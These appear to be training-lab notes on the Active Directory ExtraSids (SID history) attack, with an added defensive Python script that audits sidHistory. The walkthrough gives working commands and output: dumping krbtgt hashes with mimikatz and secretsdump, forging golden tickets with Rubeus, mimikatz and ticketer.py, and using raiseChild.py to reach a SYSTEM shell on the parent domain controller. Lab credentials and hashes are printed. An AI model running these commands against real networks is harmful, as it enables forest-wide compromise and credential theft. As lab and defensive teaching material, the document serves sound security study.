Intra-Forest Attack: ExtraSids Attack

1. Lab Environment

  • DC02 (child domain controller) - 10.129.229.207 (DHCP) / 172.16.210.3 (dual NIC) dev.inlanefreight.ad
  • DC01 (parent domain controller) - 172.16.210.99 inlanefreight.ad
  • Credentials for DC02: Administrator / HTB_@cademy_adm!

2. Introduction

The ExtraSids attack, also known as SID history abuse, is a technique for escalating privileges from a child domain to the parent domain in an Active Directory environment.

The attacker exploits the SID history attribute of a user account to gain unauthorized access and escalate to the parent domain of the Active Directory environment. The technique involves manipulating the SID history attribute of a user account in the child domain so that it inherits the permissions or group memberships of an account or group in the parent domain.

Within the same forest, the sidHistory attribute is honoured because no SID filtering protection applies. SID filtering is a protection mechanism designed to strip domain SIDs belonging to the other forest from authentication requests that cross a forest trust. Consequently, if a user in the child domain has their sidHistory set to the Enterprise Admins group (which exists only in the parent domain), that user is treated as a member of the group and gains administrative access to the entire forest. In other words, a compromised child domain can be used to create a golden ticket and thereby compromise the parent domain.

In this scenario we abuse SID History by modifying this attribute to include the SID of the Enterprise Admins group, granting an account (or even a non-existent account) Enterprise Admin rights. This gives us full access to the parent domain without actually being a member of that group.

2.1. Prerequisites:

To perform this attack after taking over the child domain, the following are required:

  • The KRBTGT hash of the child domain
  • The SID of the child domain
  • The FQDN of the child domain
  • The SID of the Enterprise Admins group in the root domain

Mimikatz can then be used to carry out the attack.

2.2. SID History

The sidHistory attribute is used in migration scenarios. When a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID is added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain.

SID history is designed to work across domains, but it also works within a single domain. An attacker can use mimikatz to perform SID history injection and add an administrator account to the SID history attribute of an account they control. When logging in with this account, all SIDs associated with the account are added to the user's token.

This token is used to determine which resources the account can access. If the SID of a Domain Admin account is added to this account's SID history attribute, the account effectively holds Domain Admin privileges.
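The two mechanisms described above (SID filtering on forest trusts, and sidHistory entries being merged into the logon token) can be made concrete with a small audit script. The example below is added here and is not code from the original notes, from HTB Academy, from Microsoft or from impacket. It models SID filtering in a simplified form (any S-1-5-21 SID outside the trusted domain's own prefix is quarantined, which is an assumption about the rule rather than a full reproduction of Windows behaviour) and audits a set of child-domain accounts for sidHistory entries that point at another domain or at a privileged well-known RID such as 519 (Enterprise Admins). The child and parent domain SIDs are the ones shown later on this page; the account list is constructed sample data.

```python
"""Audit sidHistory / PAC extra SIDs for cross-domain privileged SIDs.

Simplified model of SID filtering plus an sidHistory audit, written for
this note (not impacket or Microsoft code). Assumption: SID filtering
drops every S-1-5-21 domain SID whose prefix is not the trusted domain's
own prefix; well-known non-domain SIDs (e.g. S-1-1-0) are left alone.
"""
import re
from dataclasses import dataclass

# Well-known RIDs that confer high privilege (RID layout as seen in the
# lookupsid output on this page).
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins",
                   518: "Schema Admins", 519: "Enterprise Admins"}

# Domain SIDs taken from the page.
CHILD_SID = "S-1-5-21-2901893446-2198612369-2488268720"
PARENT_SID = "S-1-5-21-2879935145-656083549-3766571964"

# Constructed sidHistory data for illustration; not a real directory dump.
SAMPLE_ACCOUNTS = {
    "j.migrated": ["S-1-5-21-111111111-222222222-333333333-1105"],  # legit migration
    "svc-backup": [PARENT_SID + "-519"],                            # injected Enterprise Admins SID
    "t.user": [],
}

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Return (domain_prefix, rid) for an NT domain SID, else (None, None)."""
    m = DOMAIN_SID_RE.match(sid)
    if not m:
        return None, None
    return m.group(1), int(m.group(2))


def sid_filter(trusted_domain_sid, sids):
    """Return (kept, dropped): what SID filtering on a trust with
    trusted_domain_sid would let through. Foreign S-1-5-21 SIDs are dropped,
    which is exactly what an intra-forest trust does NOT do."""
    kept, dropped = [], []
    for sid in sids:
        prefix, _ = split_sid(sid)
        if prefix is not None and prefix != trusted_domain_sid:
            dropped.append(sid)
        else:
            kept.append(sid)
    return kept, dropped


@dataclass
class Finding:
    account: str
    sid: str
    reason: str


def audit_sid_history(own_domain_sid, accounts):
    """accounts: {samAccountName: [sidHistory entries]} from one domain.
    Flags entries pointing at another domain and/or at a privileged RID."""
    findings = []
    for name, history in accounts.items():
        for sid in history:
            prefix, rid = split_sid(sid)
            if prefix is None:
                continue  # not a domain SID; nothing to compare
            reasons = []
            if prefix != own_domain_sid:
                reasons.append("foreign domain prefix")
            if rid in PRIVILEGED_RIDS:
                reasons.append(f"privileged RID {rid} ({PRIVILEGED_RIDS[rid]})")
            if reasons:
                findings.append(Finding(name, sid, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    kept, dropped = sid_filter(CHILD_SID, [CHILD_SID + "-500", PARENT_SID + "-519", "S-1-1-0"])
    print("SID filtering would keep:", kept, "and drop:", dropped)
    for f in audit_sid_history(CHILD_SID, SAMPLE_ACCOUNTS):
        print(f"{f.account}: {f.sid} -> {f.reason}")
```

A legitimately migrated account shows up with only the "foreign domain prefix" reason, while an injected Enterprise Admins SID is flagged on both counts; auditing sidHistory for foreign privileged RIDs is the practical check a defender can run on a child domain, since the forest trust itself will not filter them.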

3. ExtraSids Attack

3.1. On Windows

Assume we have already compromised the child domain; we now use SIDHistory to move to the parent domain.

3.1.1. Obtain the child domain KRBTGT hash

PS C:\Tools> .\mimikatz.exe "lsadump::dcsync /user:DEV\krbtgt" exit
.#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > https://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
'#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:DEV\krbtgt
[DC] 'dev.INLANEFREIGHT.AD' will be the domain
[DC] 'DC02.dev.INLANEFREIGHT.AD' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
Object RDN           : krbtgt
** SAM ACCOUNT **
SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 5/15/2023 5:39:11 AM
Object Security ID   : S-1-5-21-2901893446-2198612369-2488268720-502
Object Relative ID   : 502
Credentials:
Hash NTLM: 992093609707726257e0959ce3e24771
ntlm- 0: 992093609707726257e0959ce3e24771
lm  - 0: 3491756dfc7414817b971dff2e4a7834
<SNIP>

The child domain's SID can also be obtained with PowerView's Get-DomainSID function.

3.1.2. Obtain the child domain SID

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID
S-1-5-21-2901893446-2198612369-2488268720

3.1.3. Obtain the Enterprise Admins SID

Obtain the SID of the Enterprise Admins group in the parent domain with PowerView's Get-DomainGroup command, or, as shown here, with Get-ADGroup from the ActiveDirectory PowerShell module:

PS C:\Tools> Get-ADGroup -Identity "Enterprise Admins" -Server "inlanefreight.ad"
DistinguishedName : CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=AD
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : caa39c09-cb6e-4021-936f-afabfa6af908
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-2879935145-656083549-3766571964-519

All required items have now been collected:

  • KRBTGT hash of the child domain: 992093609707726257e0959ce3e24771
  • SID of the child domain: S-1-5-21-2901893446-2198612369-2488268720
  • Name of the target user in the child domain: Administrator
  • FQDN of the child domain: DEV.INLANEFREIGHT.AD
  • SID of the Enterprise Admins group: S-1-5-21-2879935145-656083549-3766571964-519

3.1.4. Forge a golden ticket with Rubeus

PS C:\Tools> .\Rubeus.exe golden /rc4:992093609707726257e0959ce3e24771 /domain:dev.inlanefreight.ad /sid:S-1-5-21-2901893446-2198612369-2488268720 /sids:S-1-5-21-2879935145-656083549-3766571964-519 /user:Administrator /ptt

______        _
(_____ \      | |
_____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v2.2.3

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : DEV.INLANEFREIGHT.AD (DEV)
[*] SID            : S-1-5-21-2901893446-2198612369-2488268720
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ExtraSIDs      : S-1-5-21-2879935145-656083549-3766571964-519
[*] ServiceKey     : 992093609707726257e0959ce3e24771
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 992093609707726257e0959ce3e24771
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : dev.inlanefreight.ad

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dev.inlanefreight.ad'

[*] AuthTime       : 3/21/2024 4:54:06 AM
[*] StartTime      : 3/21/2024 4:54:06 AM
[*] EndTime        : 3/21/2024 2:54:06 PM
[*] RenewTill      : 3/28/2024 4:54:06 AM

[*] base64(ticket.kirbi):

doIF0TCCBc2gAwIBBaEDAgEWooIEtjCCBLJhggSuMIIEqqADAgEFoRYbFERFVi5JTkxBTkVGUkVJR0hU
LkFEoikwJ6ADAgECoSAwHhsGa3JidGd0GxRkZXYuaW5sYW5lZnJlaWdodC5hZKOCBF4wggRaoAMCAReh
AwIBA6KCBEwEggRIkMMhmLRh550nQxK7xcfcOYmGq42kxRqaQl1dXbPhNFiORjzYNq/ANWORzK/aVk7y
BnlJuRZNmWxSYLfIAc0L9FXg16byN9budsgda9OnunMhzCph8+yZO7PyZY87ZiwfCD2/+3HV2J4hlSqE
tUGupnqDoDCErp1fB8UE53Na9srZOs8S05Qg4T38Xj4mXymqu19VyJN2lYmszU/+li+WQoPjgi9DKwVT
umEQa36EKOlZ1weSSP7TwFvi46G+scSihtgO52iA+mP6KV6Qqcn4IaCfUzKc54dtzF8lyTKpLOBfSAyA
jtMLgxSmaJy76tHf9vJ6V5E1JMfXoJS3S3MOYDud/uk4sUzNTmmsiRCBdTs/B3VttTG6NLPwCgp8Lr3c
TJtqtx29mEqYNFbectK+BQYHhpYraBOKhHR2UrOt6d1R8cVv1x4s8iRB9PAZ5lHVJwKrljqGXB9Q3TMw
y3CFZ2kOo2TSBSUW31KFnPhX7fKStTonQyHM+rCFPuV68FUFPCarZZdhchEdd3Lz8anGFQFNvXt6qLva
oSOWY7UHWU482K2J9/LY4rRMJIAY8Wd9CmNNkOSLm/Z0bz3H1h57D7k+GWBSIvR0HDyZ4OcyYOMHZmSM
lsDH1Riw7/OwaiFAejXY+t8hTICTn5B/K6/xuYxgj7E7KhQgGpVWzEoaFTBD9fDP2RGSfbKpykj+iHU+
gYNI+PimQHQEbdqj5v8c+SBdC/1K6vCpTsJYHHOKZt+ZGcGyVfcn93FX1eI2wWmEMaO+9wauPtqd5VuK
<SNIP>

[+] Ticket successfully imported!

3.1.5. Forge a golden ticket with Mimikatz

Besides Rubeus, mimikatz can also generate the golden ticket. Mimikatz offers another way to perform the ExtraSids attack and produce golden tickets for privilege escalation.

C:\Tools> mimikatz.exe
.#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > https://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
'#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /user:Administrator /domain:dev.inlanefreight.ad  /sid:S-1-5-21-2901893446-2198612369-2488268720 /krbtgt:992093609707726257e0959ce3e24771 /sids:S-1-5-21-2879935145-656083549-3766571964-519 /ptt

User      : Administrator
Domain    : dev.inlanefreight.ad (DEV)
SID       : S-1-5-21-2901893446-2198612369-2488268720
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2879935145-656083549-3766571964-519 ;
ServiceKey: 992093609707726257e0959ce3e24771 - rc4_hmac_nt
Lifetime  : 3/20/2024 5:41:55 AM ; 3/18/2034 5:41:55 AM ; 3/18/2034 5:41:55 AM
-> Ticket : ** Pass The Ticket **

    * PAC generated
    * PAC signed
    * EncTicketPart generated
    * EncTicketPart encrypted
    * KrbCred generated

Golden ticket for 'Administrator @ dev.inlanefreight.ad' successfully submitted for current session

Verify the ticket:

PS C:\Tools> klist
Current LogonId is 0:0x7a8eb
Cached Tickets: (1)
#0>     Client: Administrator @ dev.inlanefreight.ad
        Server: krbtgt/dev.inlanefreight.ad @ dev.inlanefreight.ad
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/21/2024 5:29:21 (local)
End Time:   3/19/2034 5:29:21 (local)
Renew Time: 3/19/2034 5:29:21 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

3.2. On Linux

3.2.1. Obtain the child domain krbtgt hash

On Linux, use impacket-secretsdump to obtain the krbtgt hash.

secretsdump.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@10.129.229.159 -just-dc-user DEV/krbtgt
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:992093609707726257e0959ce3e24771:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:063d5b8a51a0b9843f12e93f28b7b055720d5a68e103c9243144ee6c703a43af
krbtgt:aes128-cts-hmac-sha1-96:fdc5f471923c5ec84322156e05e97eba
krbtgt:des-cbc-md5:fe31dfd5408c7073
[*] Cleaning up...

3.2.2. Obtain the child domain SID

Use impacket-lookupsid to obtain the SID.

lookupsid.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@10.129.229.159 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-2901893446-2198612369-2488268720

Then obtain the SID of the Enterprise Admins group; it is normally the parent domain SID followed by RID 519.

lookupsid.py dev.inlanefreight.ad/Administrator:'HTB_@cademy_adm!'@172.16.210.99 | grep -B12 "Enterprise Admins"
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  172.16.210.99:445  ...  OK
[*] Domain SID is: S-1-5-21-2879935145-656083549-3766571964
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: INLANEFREIGHT\Administrator (SidTypeUser)
501: INLANEFREIGHT\Guest (SidTypeUser)
502: INLANEFREIGHT\krbtgt (SidTypeUser)
512: INLANEFREIGHT\Domain Admins (SidTypeGroup)
513: INLANEFREIGHT\Domain Users (SidTypeGroup)
514: INLANEFREIGHT\Domain Guests (SidTypeGroup)
515: INLANEFREIGHT\Domain Computers (SidTypeGroup)
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup)
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias)
518: INLANEFREIGHT\Schema Admins (SidTypeGroup)
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)

3.2.3. Forge a golden ticket with ticketer.py

Use impacket-ticketer to forge a golden ticket.

ticketer.py -nthash 992093609707726257e0959ce3e24771 -domain dev.inlanefreight.ad -domain-sid S-1-5-21-2901893446-2198612369-2488268720 -extra-sid S-1-5-21-2879935145-656083549-3766571964-519 htb-student
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for dev.inlanefreight.ad/htb-student
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in htb-student.ccache

3.2.4. psexec

export KRB5CCNAME=htb-student.ccache

psexec.py dev.inlanefreight.ad/htb-student@DC01.inlanefreight.ad -k -no-pass -target-ip 172.16.210.99

3.3. Automating the attack with raiseChild.py

impacket-raiseChild automates the escalation from the child domain to the parent domain; the script performs the whole process by creating a golden ticket for the forest's Enterprise Admins.
Running it only requires the credentials of an administrator in the child domain.

proxychains raiseChild.py -target-exec 172.16.210.99 dev.inlanefreight.ad/htb-student
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password: HTB_@cademy_stdnt!
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  172.16.210.99:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  dev.inlanefreight.ad:445  ...  OK

[*] Raising child domain dev.INLANEFREIGHT.AD
[*] Forest FQDN is: INLANEFREIGHT.AD
[*] Raising dev.INLANEFREIGHT.AD to INLANEFREIGHT.AD
[*] INLANEFREIGHT.AD Enterprise Admin SID is: S-1-5-21-2879935145-656083549-3766571964-519
[*] Getting credentials for dev.INLANEFREIGHT.AD
dev.INLANEFREIGHT.AD/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:992093609707726257e0959ce3e24771:::
dev.INLANEFREIGHT.AD/krbtgt:aes256-cts-hmac-sha1-96s:063d5b8a51a0b9843f12e93f28b7b055720d5a68e103c9243144ee6c703a43af
[*] Getting credentials for INLANEFREIGHT.AD
INLANEFREIGHT.AD/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f010dc02629137a52a934477510431dd:::
INLANEFREIGHT.AD/krbtgt:aes256-cts-hmac-sha1-96s:d4b96d6177a50bc2d283a46a9726da6d17724c5b6722cc4a5e3b32319499e0b9
[*] Target User account name is Administrator
INLANEFREIGHT.AD/Administrator:500:aad3b435b51404eeaad3b435b51404ee:6a1b9ccba556848665ca315b3e096fdb:::
INLANEFREIGHT.AD/Administrator:aes256-cts-hmac-sha1-96s:9d76fc817ad130c2735cf8a68f4825947bd0fa52fecdd1506a785e9bcc24d19e
[*] Opening PSEXEC shell at DC01.INLANEFREIGHT.AD
[*] Requesting shares on DC01.INLANEFREIGHT.AD.....
[-] share 'ADCS_flag' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file TlktMwUI.exe
[*] Opening SVCManager on DC01.INLANEFREIGHT.AD.....
[*] Creating service qDDc on DC01.INLANEFREIGHT.AD.....
[*] Starting service qDDc.....
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
DC01